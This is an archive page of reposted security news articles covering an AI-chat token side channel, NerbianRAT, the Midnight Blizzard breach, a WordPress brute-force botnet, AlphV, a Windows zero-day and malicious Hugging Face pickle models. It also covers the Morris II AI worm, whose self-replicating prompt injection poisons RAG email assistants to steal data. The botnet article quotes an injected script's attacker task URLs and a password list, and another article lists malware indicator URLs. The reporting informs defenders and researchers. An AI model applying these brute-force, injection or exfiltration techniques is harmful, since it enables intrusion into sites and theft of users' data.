Security – Page 14

Hackers can read private AI-assistant chats even though they’re encrypted

AI, Artificial Intelligence, Biz & IT, Encryption, Features, gpt, privacy, Security, side channel / Mike M. / March 14, 2024

CHATBOT KEYLOGGING —

All non-Google chat GPTs affected by side channel that leaks responses sent to users.

Dan Goodin – Mar 14, 2024 12: 30 pm UTC

AI assistants have been widely available for a little more than a year, and they already have access to our most private thoughts and business secrets. People ask them about becoming pregnant or terminating or preventing pregnancy, consult them when considering a divorce, seek information about drug addiction, or ask for edits in emails containing proprietary trade secrets. The providers of these AI-powered chat services are keenly aware of the sensitivity of these discussions and take active steps—mainly in the form of encrypting them—to prevent potential snoops from reading other people’s interactions.

But now, researchers have devised an attack that deciphers AI assistant responses with surprising accuracy. The technique exploits a side channel present in all of the major AI assistants, with the exception of Google Gemini. It then refines the fairly raw results through large language models specially trained for the task. The result: Someone with a passive adversary-in-the-middle position—meaning an adversary who can monitor the data packets passing between an AI assistant and the user—can infer the specific topic of 55 percent of all captured responses, usually with high word accuracy. The attack can deduce responses with perfect word accuracy 29 percent of the time.

Token privacy

“Currently, anybody can read private chats sent from ChatGPT and other services,” Yisroel Mirsky, head of the Offensive AI Research Lab at Ben-Gurion University in Israel, wrote in an email. “This includes malicious actors on the same Wi-Fi or LAN as a client (e.g., same coffee shop), or even a malicious actor on the Internet—anyone who can observe the traffic. The attack is passive and can happen without OpenAI or their client’s knowledge. OpenAI encrypts their traffic to prevent these kinds of eavesdropping attacks, but our research shows that the way OpenAI is using encryption is flawed, and thus the content of the messages are exposed.”

Mirsky was referring to OpenAI, but with the exception of Google Gemini, all other major chatbots are also affected. As an example, the attack can infer the encrypted ChatGPT response:

Yes, there are several important legal considerations that couples should be aware of when considering a divorce, …

as:

Yes, there are several potential legal considerations that someone should be aware of when considering a divorce. …

and the Microsoft Copilot encrypted response:

Here are some of the latest research findings on effective teaching methods for students with learning disabilities: …

is inferred as:

Here are some of the latest research findings on cognitive behavior therapy for children with learning disabilities: …

While the underlined words demonstrate that the precise wording isn’t perfect, the meaning of the inferred sentence is highly accurate.

Enlarge / Attack overview: A packet capture of an AI assistant’s real-time response reveals a token-sequence side-channel. The side-channel is parsed to find text segments that are then reconstructed using sentence-level context and knowledge of the target LLM’s writing style.

Weiss et al.

The following video demonstrates the attack in action against Microsoft Copilot:

Token-length sequence side-channel attack on Bing.

A side channel is a means of obtaining secret information from a system through indirect or unintended sources, such as physical manifestations or behavioral characteristics, such as the power consumed, the time required, or the sound, light, or electromagnetic radiation produced during a given operation. By carefully monitoring these sources, attackers can assemble enough information to recover encrypted keystrokes or encryption keys from CPUs, browser cookies from HTTPS traffic, or secrets from smartcards. The side channel used in this latest attack resides in tokens that AI assistants use when responding to a user query.

Tokens are akin to words that are encoded so they can be understood by LLMs. To enhance the user experience, most AI assistants send tokens on the fly, as soon as they’re generated, so that end users receive the responses continuously, word by word, as they’re generated rather than all at once much later, once the assistant has generated the entire answer. While the token delivery is encrypted, the real-time, token-by-token transmission exposes a previously unknown side channel, which the researchers call the “token-length sequence.”

Hackers can read private AI-assistant chats even though they’re encrypted Read More »

Never-before-seen Linux malware gets installed using 1-day exploits

Biz & IT, Security / Rejus Almole / March 12, 2024

Researchers have unearthed Linux malware that circulated in the wild for at least two years before being identified as a credential stealer that’s installed by the exploitation of recently patched vulnerabilities.

The newly identified malware is a Linux variant of NerbianRAT, a remote access Trojan first described in 2022 by researchers at security firm Proofpoint. Last Friday, Checkpoint Research revealed that the Linux version has existed since at least the same year, when it was uploaded to the VirusTotal malware identification site. Checkpoint went on to conclude that Magnet Goblin—the name the security firm uses to track the financially motivated threat actor using the malware—has installed it by exploiting “1-days,” which are recently patched vulnerabilities. Attackers in this scenario reverse engineer security updates, or copy associated proof-of-concept exploits, for use against devices that have yet to install the patches.

Checkpoint also identified MiniNerbian, a smaller version of NerbianRAT for Linux that’s used to backdoor servers running the Magento ecommerce server, primarily for use as command-and-control servers that devices infected by NerbianRAT connect to. Researchers elsewhere have reported encountering servers that appear to have been compromised with MiniNerbian, but Checkpoint Research appears to have been the first to identify the underlying binary.

“Magnet Goblin, whose campaigns appear to be financially motivated, has been quick to adopt 1-day vulnerabilities to deliver their custom Linux malware, NerbianRAT and MiniNerbian,” Checkpoint researchers wrote. “Those tools have operated under the radar as they mostly reside on edge-devices. This is part of an ongoing trend for threat actors to target areas which until now have been left unprotected.”

Checkpoint discovered the Linux malware while researching recent attacks that exploit critical vulnerabilities in Ivanti Secure Connect, which have been under mass exploitation since early January. In the past, Magnet Goblin has installed the malware by exploiting one-day vulnerabilities in Magento, Qlink Sense, and possibly Apache ActiveMQ.

In the course of its investigation into the Ivanti exploitation, Checkpoint found the Linux version of NerbianRAT on compromised servers that were under the control of Magnet Goblin. URLs included:

http://94.156.71[.]115/lxrt

http://91.92.240[.]113/aparche2

http://45.9.149[.]215/aparche2

The Linux variants connect back to the attacker-controlled IP 172.86.66[.]165.

Besides deploying NerbianRAT, Magnet Goblin also installed a custom variant of malware tracked as WarpWire, a piece of stealer malware recently reported by security firm Mandiant. The variant Checkpoint encountered stole VPN credentials and sent them to a server at the domain miltonhouse[.]nl.

NerbianRAT Windows featured robust code that took pains to hide itself and to prevent reverse engineering by rivals or researchers.

“Unlike its Windows equivalent, the Linux version barely has any protective measures,” Checkpoint said. “It is sloppily compiled with DWARF debugging information, which allows researchers to view, among other things, function names and global variable names.”

Never-before-seen Linux malware gets installed using 1-day exploits Read More »

Microsoft says Kremlin-backed hackers accessed its source and internal systems

apts, Biz & IT, microsoft, midnight blizzard, Security, source code / Kris Guyer / March 9, 2024

THE PLOT THICKENS —

Midnight Blizzard is now using stolen secrets in follow-on attacks against customers.

Dan Goodin – Mar 8, 2024 6: 42 pm UTC

Microsoft said that Kremlin-backed hackers who breached its corporate network in January have expanded their access since then in follow-on attacks that are targeting customers and have compromised the company’s source code and internal systems.

The intrusion, which the software company disclosed in January, was carried out by Midnight Blizzard, the name used to track a hacking group widely attributed to the Federal Security Service, a Russian intelligence agency. Microsoft said at the time that Midnight Blizzard gained access to senior executives’ email accounts for months after first exploiting a weak password in a test device connected to the company’s network. Microsoft went on to say it had no indication any of its source code or production systems had been compromised.

Secrets sent in email

In an update published Friday, Microsoft said it uncovered evidence that Midnight Blizzard had used the information it gained initially to further push into its network and compromise both source code and internal systems. The hacking group—which is tracked under multiple other names, including APT29, Cozy Bear, CozyDuke, The Dukes, Dark Halo, and Nobelium—has been using the proprietary information in follow-on attacks, not only against Microsoft but also its customers.

“In recent weeks, we have seen evidence that Midnight Blizzard is using information initially exfiltrated from our corporate email systems to gain, or attempt to gain, unauthorized access,” Friday’s update said. “This has included access to some of the company’s source code repositories and internal systems. To date we have found no evidence that Microsoft-hosted customer-facing systems have been compromised.

In January’s disclosure, Microsoft said Midnight Blizzard used a password-spraying attack to compromise a “legacy non-production test tenant account” on the company’s network. Those details meant that the account hadn’t been removed once it was decommissioned, a practice that’s considered essential for securing networks. The details also meant that the password used to log in to the account was weak enough to be guessed by sending a steady stream of credentials harvested from previous breaches—a technique known as password spraying.

In the months since, Microsoft said Friday, Midnight Blizzard has been exploiting the information it obtained earlier in follow-on attacks that have stepped up an already high rate of password spraying.

Unprecedented global threat

Microsoft officials wrote:

It is apparent that Midnight Blizzard is attempting to use secrets of different types it has found. Some of these secrets were shared between customers and Microsoft in email, and as we discover them in our exfiltrated email, we have been and are reaching out to these customers to assist them in taking mitigating measures. Midnight Blizzard has increased the volume of some aspects of the attack, such as password sprays, by as much as 10-fold in February, compared to the already large volume we saw in January 2024.

Midnight Blizzard’s ongoing attack is characterized by a sustained, significant commitment of the threat actor’s resources, coordination, and focus. It may be using the information it has obtained to accumulate a picture of areas to attack and enhance its ability to do so. This reflects what has become more broadly an unprecedented global threat landscape, especially in terms of sophisticated nation-state attacks.

The attack began in November and wasn’t detected until January. Microsoft said then that the breach allowed Midnight Blizzard to monitor the email accounts of senior executives and security personnel, raising the possibility that the group was able to read sensitive communications for as long as three months. Microsoft said one motivation for the attack was for Midnight Blizzard to learn what the company knew about the threat group. Microsoft said at the time and reiterated again Friday that it had no evidence the hackers gained access to customer-facing systems.

Midnight Blizzard is among the most prolific APTs, short for advanced persistent threats, the term used for skilled, well-funded hacking groups that are mostly backed by nation-states. The group was behind the SolarWinds supply-chain attack that led to the hacking of the US Departments of Energy, Commerce, Treasury, and Homeland Security and about 100 private-sector companies.

Last week, the UK National Cyber Security Centre (NCSC) and international partners warned that in recent months, the threat group has expanded its activity to target aviation, education, law enforcement, local and state councils, government financial departments, and military organizations.

Microsoft says Kremlin-backed hackers accessed its source and internal systems Read More »

Attack wrangles thousands of web users into a password-cracking botnet

Biz & IT, botnets, password cracking, passwords, Security, websites / Mike M. / March 8, 2024

DISTRIBUTED PASSWORD CRACKING —

Ongoing attack is targeting thousands of sites, continues to grow.

Dan Goodin – Mar 7, 2024 10: 29 pm UTC

Attackers have transformed hundreds of hacked sites running WordPress software into command-and-control servers that force visitors’ browsers to perform password-cracking attacks.

A web search for the JavaScript that performs the attack showed it was hosted on 708 sites at the time this post went live on Ars, up from 500 two days ago. Denis Sinegubko, the researcher who spotted the campaign, said at the time that he had seen thousands of visitor computers running the script, which caused them to reach out to thousands of domains in an attempt to guess the passwords of usernames with accounts on them.

Visitors unwittingly recruited

“This is how thousands of visitors across hundreds of infected websites unknowingly and simultaneously try to bruteforce thousands of other third-party WordPress sites,” Sinegubko wrote. “And since the requests come from the browsers of real visitors, you can imagine this is a challenge to filter and block such requests.”

Like the hacked websites hosting the malicious JavaScript, all the targeted domains are running the WordPress content management system. The script—just 3 kilobits in size—reaches out to an attacker-controlled getTaskURL, which in turn provides the name of a specific user on a specific WordPress site, along with 100 common passwords. When this data is fed into the browser visiting the hacked site, it attempts to log in to the targeted user account using the candidate passwords. The JavaScript operates in a loop, requesting tasks from the getTaskURL, reporting the results to the completeTaskURL, and then performing the steps again and again.

A snippet of the hosted JavaScript appears below, and below that, the resulting task:

const getTaskUrl = 'hxxps://dynamic-linx[.]com/getTask.php';  const completeTaskUrl = 'hxxps://dynamic-linx[.]com/completeTask.php';  …

[871,"https://REDACTED","redacted","60","junkyard","johncena","jewish","jakejake","invincible","intern","indira","hawthorn","hawaiian","hannah1","halifax","greyhound","greene","glenda","futbol","fresh","frenchie","flyaway","fleming","fishing1","finally","ferris","fastball","elisha","doggies","desktop","dental","delight","deathrow","ddddddd","cocker","chilly","chat","casey1","carpenter","calimero","calgary","broker","breakout","bootsie","bonito","black123","bismarck","bigtime","belmont","barnes","ball","baggins","arrow","alone","alkaline","adrenalin","abbott","987987","3333333","123qwerty","000111","zxcv1234","walton","vaughn","tryagain","trent","thatcher","templar","stratus","status","stampede","small","sinned","silver1","signal","shakespeare","selene","scheisse","sayonara","santacruz","sanity","rover","roswell","reverse","redbird","poppop","pompom","pollux","pokerface","passions","papers","option","olympus","oliver1","notorious","nothing1","norris","nicole1","necromancer","nameless","mysterio","mylife","muslim","monkey12","mitsubishi"]

With 418 password batches as of Tuesday, Sinegubko has concluded the attackers are trying 41,800 passwords against each targeted site.

Sinegubko wrote:

Attack stages and lifecycle

The attack consists of five key stages that allow a bad actor to leverage already compromised websites to launch distributed brute force attacks against thousands of other potential victim sites.

Stage 1: Obtain URLs of WordPress sites. The attackers either crawl the Internet themselves or use various search engines and databases to obtain lists of target WordPress sites.

Stage 2: Extract author usernames. Attackers then scan the target sites, extracting real usernames of authors that post on those domains.

Stage 3: Inject malicious scripts. Attackers then inject their dynamic-linx[.]com/chx.js script to websites that they have already compromised.

Stage 4: Brute force credentials. As normal site visitors open infected web pages, the malicious script is loaded. Behind the scenes, the visitors’ browsers conduct a distributed brute force attack on thousands of target sites without any active involvement from attackers.

Stage 5: Verify compromised credentials. Bad actors verify brute forced credentials and gain unauthorized access to sites targeted in stage 1.

So, how do attackers actually accomplish a distributed brute force attack from the browsers of completely innocent and unsuspecting website visitors? Let’s take a look at stage 4 in closer detail.

Distributed brute force attack steps:

When a site visitor opens an infected web page, the user’s browser requests a task from the hxxps://dynamic-linx[.]com/getTask.php URL.

If the task exists, it parses the data and obtains the URL of the site to attack along with a valid username and a list of 100 passwords to try.

For every password in the list, the visitor’s browser sends the wp.uploadFile XML-RPC API request to upload a file with encrypted credentials that were used to authenticate this specific request. That’s 100 API requests for each task! If authentication succeeds, a small text file with valid credentials is created in the WordPress uploads directory.

When all the passwords are checked, the script sends a notification to hxxps://dynamic-linx[.]com/completeTask.php that the task with a specific taskId (probably a unique site) and checkId (password batch) has been completed.

Finally, the script requests the next task and processes a new batch of passwords. And so on indefinitely while the infected page is open.

As of Tuesday, the researcher had observed “dozens of thousands of requests” to thousands of unique domains that checked for files uploaded by the visitor browsers. Most files reported 404 web errors, an indication that the login using the guessed password failed. Roughly 0.5 percent of cases returned a 200 response code, leaving open the possibility that password guesses may have been successful. On further inspection, only one of the sites was compromised. The others were using non-standard configurations that returned the 200 response, even for pages that weren’t available.

Over a four-day span ending Tuesday, Sinegubko recorded more than 1,200 unique IP addresses that tried to download the credentials file. Of those, five addresses accounted for over 85 percent of the requests:

IP	%	ASN
146.70.199.169	34.37%	M247, RO
138.199.60.23	28.13%	CDNEXT, GB
138.199.60.32	10.96%	CDNEXT, GB
138.199.60.19	6.54%	CDNEXT, GB
87.121.87.178	5.94%	SOUZA-AS, BR

Last month, the researcher observed one of the addresses—87.121.87.178—hosting a URL used in a cryptojacking attack. One possibility for the change is that the earlier campaign failed because the malicious URL it relied on wasn’t hosted on enough hacked sites and, in response, the same attacker is using the password-cracking script in an attempt to recruit more sites.

As Sinegubko notes, the more recent campaign is significant because it leverages the computers and Internet connections of unwitting visitors who have done nothing wrong. One way end users can stop this is to use NoScript or another tool that blocks JavaScript from running on unknown sites. NoScript breaks enough sites that it’s not suitable for less experienced users, and even those with more experience often find the hassle isn’t worth the benefit. One other possible remedy is to use certain ad blockers.

Attack wrangles thousands of web users into a password-cracking botnet Read More »

After collecting $22 million, AlphV ransomware group stages FBI takedown

alphv, Biz & IT, blackcat, exit scam, ransomware, Security / Mike M. / March 6, 2024

A ransom note is plastered across a laptop monitor.

The ransomware group responsible for hamstringing the prescription drug market for two weeks has suddenly gone dark, just days after receiving a $22 million payment and standing accused of scamming an affiliate out of its share of the loot.

The events involve AlphV, a ransomware group also known as BlackCat. Two weeks ago, it took down Change Healthcare, the biggest US health care payment processor, leaving pharmacies, health care providers, and patients scrambling to fill prescriptions for medicines. On Friday, the bitcoin ledger shows, the group received nearly $22 million in cryptocurrency, stoking suspicions the deposit was payment by Change Healthcare in exchange for AlphV decrypting its data and promising to delete it.

Representatives of Optum, the parent company, declined to say if the company has paid AlphV.

Honor among thieves

On Sunday, two days following the payment, a party claiming to be an AlphV affiliate said in an online crime forum that the nearly $22 million payment was tied to the Change Healthcare breach. The party went on to say that AlphV members had cheated the affiliate out of the agreed-upon cut of the payment. In response, the affiliate said it hadn’t deleted the Change Healthcare data it had obtained.

Enlarge / A message left in a crime forum from a party claiming to be an AlphV affiliate. The post claims AlphV scammed the affiliate out of its cut.

vxunderground

On Tuesday—four days after the bitcoin payment was made and two days after the affiliate claimed to have been cheated out of its cut—AlphV’s public dark web site started displaying a message saying it had been seized by the FBI as part of an international law enforcement action.

Enlarge / The AlphV extortion site as it appeared on Tuesday.

The UK’s National Crime Agency, one of the agencies the seizure message said was involved in the takedown, said the agency played no part in any such action. The FBI, meanwhile, declined to comment. The NCA denial, as well as evidence the seizure notice was copied from a different site and pasted into the AlphV one, has led multiple researchers to conclude the ransomware group staged the takedown and took the entire $22 million payment for itself.

“Since people continue to fall for the ALPHV/BlackCat cover up: ALPHV/BlackCat did not get seized,” Fabian Wosar, head of ransomware research at security firm Emsisoft, wrote on social media. “They are exit scamming their affiliates. It is blatantly obvious when you check the source code of the new takedown notice.”

After collecting $22 million, AlphV ransomware group stages FBI takedown Read More »

Hackers exploited Windows 0-day for 6 months after Microsoft knew of it

Biz & IT, lazarus group, microsoft, Security / Kris Guyer / March 5, 2024

The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.

Hackers backed by the North Korean government gained a major win when Microsoft left a Windows zero-day unpatched for six months after learning it was under active exploitation.

Even after Microsoft patched the vulnerability last month, the company made no mention that the North Korean threat group Lazarus had been using the vulnerability since at least August to install a stealthy rootkit on vulnerable computers. The vulnerability provided an easy and stealthy means for malware that had already gained administrative system rights to interact with the Windows kernel. Lazarus used the vulnerability for just that. Even so, Microsoft has long said that such admin-to-kernel elevations don’t represent the crossing of a security boundary, a possible explanation for the time Microsoft took to fix the vulnerability.

A rootkit “holy grail”

“When it comes to Windows security, there is a thin line between admin and kernel,” Jan Vojtěšek, a researcher with security firm Avast, explained last week. “Microsoft’s security servicing criteria have long asserted that ‘[a]dministrator-to-kernel is not a security boundary,’ meaning that Microsoft reserves the right to patch admin-to-kernel vulnerabilities at its own discretion. As a result, the Windows security model does not guarantee that it will prevent an admin-level attacker from directly accessing the kernel.”

The Microsoft policy proved to be a boon to Lazarus in installing “FudModule,” a custom rootkit that Avast said was exceptionally stealthy and advanced. Rootkits are pieces of malware that have the ability to hide their files, processes, and other inner workings from the operating system itself and at the same time control the deepest levels of the operating system. To work, they must first gain administrative privileges—a major accomplishment for any malware infecting a modern OS. Then, they must clear yet another hurdle: directly interacting with the kernel, the innermost recess of an OS reserved for the most sensitive functions.

In years past, Lazarus and other threat groups have reached this last threshold mainly by exploiting third-party system drivers, which by definition already have kernel access. To work with supported versions of Windows, third-party drivers must first be digitally signed by Microsoft to certify that they are trustworthy and meet security requirements. In the event Lazarus or another threat actor has already cleared the admin hurdle and has identified a vulnerability in an approved driver, they can install it and exploit the vulnerability to gain access to the Windows kernel. This technique—known as BYOVD (bring your own vulnerable driver)—comes at a cost, however, because it provides ample opportunity for defenders to detect an attack in progress.

The vulnerability Lazarus exploited, tracked as CVE-2024-21338, offered considerably more stealth than BYOVD because it exploited appid.sys, a driver enabling the Windows AppLocker service, which comes preinstalled in the Microsoft OS. Avast said such vulnerabilities represent the “holy grail,” as compared to BYOVD.

In August, Avast researchers sent Microsoft a description of the zero-day, along with proof-of-concept code that demonstrated what it did when exploited. Microsoft didn’t patch the vulnerability until last month. Even then, the disclosure of the active exploitation of CVE-2024-21338 and details of the Lazarus rootkit came not from Microsoft in February but from Avast 15 days later. A day later, Microsoft updated its patch bulletin to note the exploitation.

Hackers exploited Windows 0-day for 6 months after Microsoft knew of it Read More »

Researchers create AI worms that can spread from one system to another

AI, malware, Security, syndication, worms / Mike M. / March 2, 2024

There’s always a downside —

Worms could potentially steal data and deploy malware.

Matt Burgess, wired.com – Mar 2, 2024 11: 47 am UTC

As generative AI systems like OpenAI’s ChatGPT and Google’s Gemini become more advanced, they are increasingly being put to work. Startups and tech companies are building AI agents and ecosystems on top of the systems that can complete boring chores for you: think automatically making calendar bookings and potentially buying products. But as the tools are given more freedom, it also increases the potential ways they can be attacked.

Now, in a demonstration of the risks of connected, autonomous AI ecosystems, a group of researchers has created one of what they claim are the first generative AI worms—which can spread from one system to another, potentially stealing data or deploying malware in the process. “It basically means that now you have the ability to conduct or to perform a new kind of cyberattack that hasn’t been seen before,” says Ben Nassi, a Cornell Tech researcher behind the research.

Nassi, along with fellow researchers Stav Cohen and Ron Bitton, created the worm, dubbed Morris II, as a nod to the original Morris computer worm that caused chaos across the Internet in 1988. In a research paper and website shared exclusively with WIRED, the researchers show how the AI worm can attack a generative AI email assistant to steal data from emails and send spam messages—breaking some security protections in ChatGPT and Gemini in the process.

The research, which was undertaken in test environments and not against a publicly available email assistant, comes as large language models (LLMs) are increasingly becoming multimodal, being able to generate images and video as well as text. While generative AI worms haven’t been spotted in the wild yet, multiple researchers say they are a security risk that startups, developers, and tech companies should be concerned about.

Most generative AI systems work by being fed prompts—text instructions that tell the tools to answer a question or create an image. However, these prompts can also be weaponized against the system. Jailbreaks can make a system disregard its safety rules and spew out toxic or hateful content, while prompt injection attacks can give a chatbot secret instructions. For example, an attacker may hide text on a webpage telling an LLM to act as a scammer and ask for your bank details.

To create the generative AI worm, the researchers turned to a so-called “adversarial self-replicating prompt.” This is a prompt that triggers the generative AI model to output, in its response, another prompt, the researchers say. In short, the AI system is told to produce a set of further instructions in its replies. This is broadly similar to traditional SQL injection and buffer overflow attacks, the researchers say.

To show how the worm can work, the researchers created an email system that could send and receive messages using generative AI, plugging into ChatGPT, Gemini, and open source LLM, LLaVA. They then found two ways to exploit the system—by using a text-based self-replicating prompt and by embedding a self-replicating prompt within an image file.

In one instance, the researchers, acting as attackers, wrote an email including the adversarial text prompt, which “poisons” the database of an email assistant using retrieval-augmented generation (RAG), a way for LLMs to pull in extra data from outside its system. When the email is retrieved by the RAG, in response to a user query, and is sent to GPT-4 or Gemini Pro to create an answer, it “jailbreaks the GenAI service” and ultimately steals data from the emails, Nassi says. “The generated response containing the sensitive user data later infects new hosts when it is used to reply to an email sent to a new client and then stored in the database of the new client,” Nassi says.

In the second method, the researchers say, an image with a malicious prompt embedded makes the email assistant forward the message on to others. “By encoding the self-replicating prompt into the image, any kind of image containing spam, abuse material, or even propaganda can be forwarded further to new clients after the initial email has been sent,” Nassi says.

In a video demonstrating the research, the email system can be seen forwarding a message multiple times. The researchers also say they could extract data from emails. “It can be names, it can be telephone numbers, credit card numbers, SSN, anything that is considered confidential,” Nassi says.

Although the research breaks some of the safety measures of ChatGPT and Gemini, the researchers say the work is a warning about “bad architecture design” within the wider AI ecosystem. Nevertheless, they reported their findings to Google and OpenAI. “They appear to have found a way to exploit prompt-injection type vulnerabilities by relying on user input that hasn’t been checked or filtered,” a spokesperson for OpenAI says, adding that the company is working to make its systems “more resilient” and saying developers should “use methods that ensure they are not working with harmful input.” Google declined to comment on the research. Messages Nassi shared with WIRED show the company’s researchers requested a meeting to talk about the subject.

While the demonstration of the worm takes place in a largely controlled environment, multiple security experts who reviewed the research say that the future risk of generative AI worms is one that developers should take seriously. This particularly applies when AI applications are given permission to take actions on someone’s behalf—such as sending emails or booking appointments—and when they may be linked up to other AI agents to complete these tasks. In other recent research, security researchers from Singapore and China have shown how they could jailbreak 1 million LLM agents in under five minutes.

Sahar Abdelnabi, a researcher at the CISPA Helmholtz Center for Information Security in Germany, who worked on some of the first demonstrations of prompt injections against LLMs in May 2023 and highlighted that worms may be possible, says that when AI models take in data from external sources or the AI agents can work autonomously, there is the chance of worms spreading. “I think the idea of spreading injections is very plausible,” Abdelnabi says. “It all depends on what kind of applications these models are used in.” Abdelnabi says that while this kind of attack is simulated at the moment, it may not be theoretical for long.

In a paper covering their findings, Nassi and the other researchers say they anticipate seeing generative AI worms in the wild in the next two to three years. “GenAI ecosystems are under massive development by many companies in the industry that integrate GenAI capabilities into their cars, smartphones, and operating systems,” the research paper says.

Despite this, there are ways people creating generative AI systems can defend against potential worms, including using traditional security approaches. “With a lot of these issues, this is something that proper secure application design and monitoring could address parts of,” says Adam Swanda, a threat researcher at AI enterprise security firm Robust Intelligence. “You typically don’t want to be trusting LLM output anywhere in your application.”

Swanda also says that keeping humans in the loop—ensuring AI agents aren’t allowed to take actions without approval—is a crucial mitigation that can be put in place. “You don’t want an LLM that is reading your email to be able to turn around and send an email. There should be a boundary there.” For Google and OpenAI, Swanda says that if a prompt is being repeated within its systems thousands of times, that will create a lot of “noise” and may be easy to detect.

Nassi and the research reiterate many of the same approaches to mitigations. Ultimately, Nassi says, people creating AI assistants need to be aware of the risks. “This is something that you need to understand and see whether the development of the ecosystem, of the applications, that you have in your company basically follows one of these approaches,” he says. “Because if they do, this needs to be taken into account.”

This story originally appeared on wired.com.

Researchers create AI worms that can spread from one system to another Read More »

US prescription market hamstrung for 9 days (so far) by ransomware attack

alphv, Biz & IT, critical infrastructure, healthcare, ransomware, Security / Mike M. / March 2, 2024

RX CHAOS —

Patients having trouble getting lifesaving meds have the AlphV crime group to thank.

Dan Goodin – Mar 1, 2024 9: 59 pm UTC

Nine days after a Russian-speaking ransomware syndicate took down the biggest US health care payment processor, pharmacies, health care providers, and patients were still scrambling to fill prescriptions for medicines, many of which are lifesaving.

On Thursday, UnitedHealth Group accused a notorious ransomware gang known both as AlphV and Black Cat of hacking its subsidiary Optum. Optum provides a nationwide network called Change Healthcare, which allows health care providers to manage customer payments and insurance claims. With no easy way for pharmacies to calculate what costs were covered by insurance companies, many had to turn to alternative services or offline methods.

The most serious incident of its kind

Optum first disclosed on February 21 that its services were down as a result of a “cyber security issue.” Its service has been hamstrung ever since. Shortly before this post went live on Ars, Optum said it had restored Change Healthcare services.

“Working with technology and business partners, we have successfully completed testing with vendors and multiple retail pharmacy partners for the impacted transaction types,” an update said. “As a result, we have enabled this service for all customers effective 1 pm CT, Friday, March 1, 2024.”

AlphV is one of many syndicates that operates under a ransomware-as-a-service model, meaning affiliates do the actual hacking of victims and then use the AlphV ransomware and infrastructure to encrypt files and negotiate a ransom. The parties then share the proceeds.

In December, the FBI and its equivalent in partner countries announced they had seized much of the AlphV infrastructure in a move that was intended to disrupt the group. AlphV promptly asserted it had unseized its site, leading to a tug-of-war between law enforcement and the group. The crippling of Change Healthcare is a clear sign that AlphV continues to pose a threat to critical parts of the US infrastructure.

“The cyberattack against Change Healthcare that began on Feb. 21 is the most serious incident of its kind leveled against a US health care organization,” said Rick Pollack, president and CEO of the American Hospital Association. Citing Change Healthcare data, Pollack said that the service processes 15 billion transactions involving eligibility verifications, pharmacy operations, and claims transmittals and payments. “All of these have been disrupted to varying degrees over the past several days and the full impact is still not known.”

Optum estimated that as of Monday, more than 90 percent of roughly 70,000 pharmacies in the US had changed how they processed electronic claims as a result of the outage. The company went on to say that only a small number of patients have been unable to get their prescriptions filled.

The scale and length of the Change Healthcare outage underscore the devastating effects ransomware has on critical infrastructure. Three years ago, members affiliated with a different ransomware group known as Darkside caused a five-day outage of Colonial Pipeline, which delivered roughly 45 percent of the East Coast’s petroleum products, including gasoline, diesel fuel, and jet fuel. The interruption caused fuel shortages that sent airlines, consumers, and filling stations scrambling.

Numerous ransomware groups have also taken down entire hospital networks in outages that in some cases have threatened patient care.

AlphV has been a key contributor to the ransomware menace. The FBI said in December the group had collected more than $300 million in ransoms. One of the better-known victims of AlphV ransomware was Caesars Entertainment and casinos owned by MGM, which brought operations in many Las Vegas casinos to a halt. A group of mostly teenagers is suspected of orchestrating that breach.

US prescription market hamstrung for 9 days (so far) by ransomware attack Read More »

Hugging Face, the GitHub of AI, hosted code that backdoored user devices

AI, Biz & IT, hacking, Hugging Face, machine learning, malware, Security / Mike M. / March 2, 2024

IN A PICKLE —

Malicious submissions have been a fact of life for code repositories. AI is no different.

Dan Goodin – Mar 1, 2024 6: 02 pm UTC

Photograph depicts a security scanner extracting virus from a string of binary code. Hand with the word — Getty Images

Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.

In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.

Full control of user devices

One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.

That, the IP address of the remote device, and the existence of identical shells connecting elsewhere raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.

“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”

A lab machine set up as a honeypot to observe what happened when the model was loaded.

JFrog

Enlarge / Secrets and other bait data the honeypot used to attract the threat actor.

JFrog

How baller432 did it

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickles is commonly used in Python to convert objects and classes in human-readable code into a byte stream so that it can be saved to disk or shared over a network. This process, known as serialization, presents hackers with the opportunity of sneaking malicious code into the flow.

The model that spawned the reverse shell, submitted by a party with the username baller432, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.

JFrog’s Cohen explained the process in much more technically detailed language:

In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:
